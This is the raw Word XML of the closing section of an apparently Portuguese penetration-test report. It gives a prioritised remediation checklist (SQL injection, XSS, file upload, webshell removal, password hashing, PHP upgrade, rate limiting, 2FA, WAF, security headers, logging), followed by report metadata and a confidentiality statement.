    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006C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p3jinl9mrn1" w:id="131"/>
      <w:bookmarkEnd w:id="1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Anexo D: Checklist de Correções</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006C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CRÍTICO - SQL Injection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prepared statements em cat.php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prepared statements em show.php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prepared statements em all.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006C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Revisar TODOS os arquivos PHP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Testar queries manualmente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Validar com SQLMap após correção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CRÍTICO - XSS Reflected</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006C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htmlspecialchars() em todas saídas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Content-Security-Policy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Validar input do usuário</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Testar payloads XSS após correção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CRÍTICO - File Upload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Validar extensão corretamente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Verificar MIME type real</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Reprocessar imagens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Mover uploads para fora do webroot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Remover permissões de execução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Bloquear PHP em diretório de uploads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Testar upload de PHP após correção</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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CRÍTICO - RCE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Remover webshell phpinfo.php7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Verificar outros arquivos suspeitos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monitoramento de integridade (AIDE)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Verificar logs de acesso</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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CRÍTICO - Senha Admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006E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Trocar senha imediatamente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Migrar MD5 para bcrypt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Alterar estrutura da tabela users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Forçar reset de senha</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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CRÍTICO - PHP Desatualizado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☐ Atualizar PHP 5.6 → 8.1+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006E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Testar compatibilidade</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006E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Fazer backup antes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Migrar código se necessário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ALTO - Rate Limiting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Instalar fail2ban</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Configurar regras</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Testar bloqueio após 5 tentativas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006F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ALTO - 2FA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Escolher solução (Google Authenticator)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no login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Forçar para admin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Documentar processo para usuários</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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MÉDIO - WAF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006F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Configurar regras Cloudflare</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Ativar OWASP ruleset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rate limiting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Testar bypasses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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MÉDIO - Directory Listing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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Desabilitar em Apache config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Adicionar Options -Indexes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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Testar todos os diretórios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MÉDIO - Security Headers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X-Frame-Options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X-XSS-Protection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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X-Content-Type-Options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Strict-Transport-Security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Content-Security-Policy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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Referrer-Policy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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Verificar com SecurityHeaders.io</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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MÉDIO - Logging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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Configurar logs Apache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Configurar logs PHP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SIEM (opcional)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Configurar alertas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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BAIXO - Information Disclosure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Desabilitar expose_php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Configurar ServerTokens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Remover header X-Powered-By</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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Personalizar páginas de erro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☐ GERAL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Fazer backup completo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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Documentar mudanças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Treinar equipe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Solicitar reteste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☐ Implementar monitoramento contínuo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FIM DO RELATÓRIO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Classificação:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> CONFIDENCIAL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 de Emissão:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 12 de Novembro de 2025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Validade das Informações:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ambiente testado entre 06-12/11/2025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Próximo Teste Recomendado:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3 meses após correções (Fevereiro/2026)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000723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Preparado por:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Equipe de Penetration Testing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Plataforma:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Raspberry Pi 4 - PiBian (Debian)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Contato:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> [informações de contato]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documento contém informações confidenciais sobre vulnerabilidades de segurança críticas. Não deve ser distribuído sem autorização expressa. O armazenamento deve seguir as diretrizes de segurança corporativa.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k3d4af8o4a9u" w:id="132"/>
      <w:bookmarkEnd w:id="13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DECLARAÇÃO DE CONFIDENCIALIDADE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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relatório é estritamente confidencial e contém informações sensíveis sobre vulnerabilidades de segurança que, se divulgadas, poderiam ser exploradas por agentes maliciosos.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Restrições de Distribuição:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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CISO e equipe de segurança</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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CTO e equipe técnica</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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CEO e diretoria</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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NÃO distribuir externamente</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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NÃO armazenar em locais não seguros</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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❌ NÃO compartilhar por email não criptografado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Armazenamento:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000073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Servidor seguro com acesso controlado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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Criptografia em repouso</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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Backup criptografado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000073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✅ Logs de acesso habilitados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Descarte:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000073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Após implementação de todas as correções e reteste bem-sucedido</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007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Mínimo de 2 anos de retenção (compliance)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000073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Destruição segura conforme política de dados sensíveis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Subtitle"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1a2kv0imt9ca" w:id="133"/>
      <w:bookmarkEnd w:id="133"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Provas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6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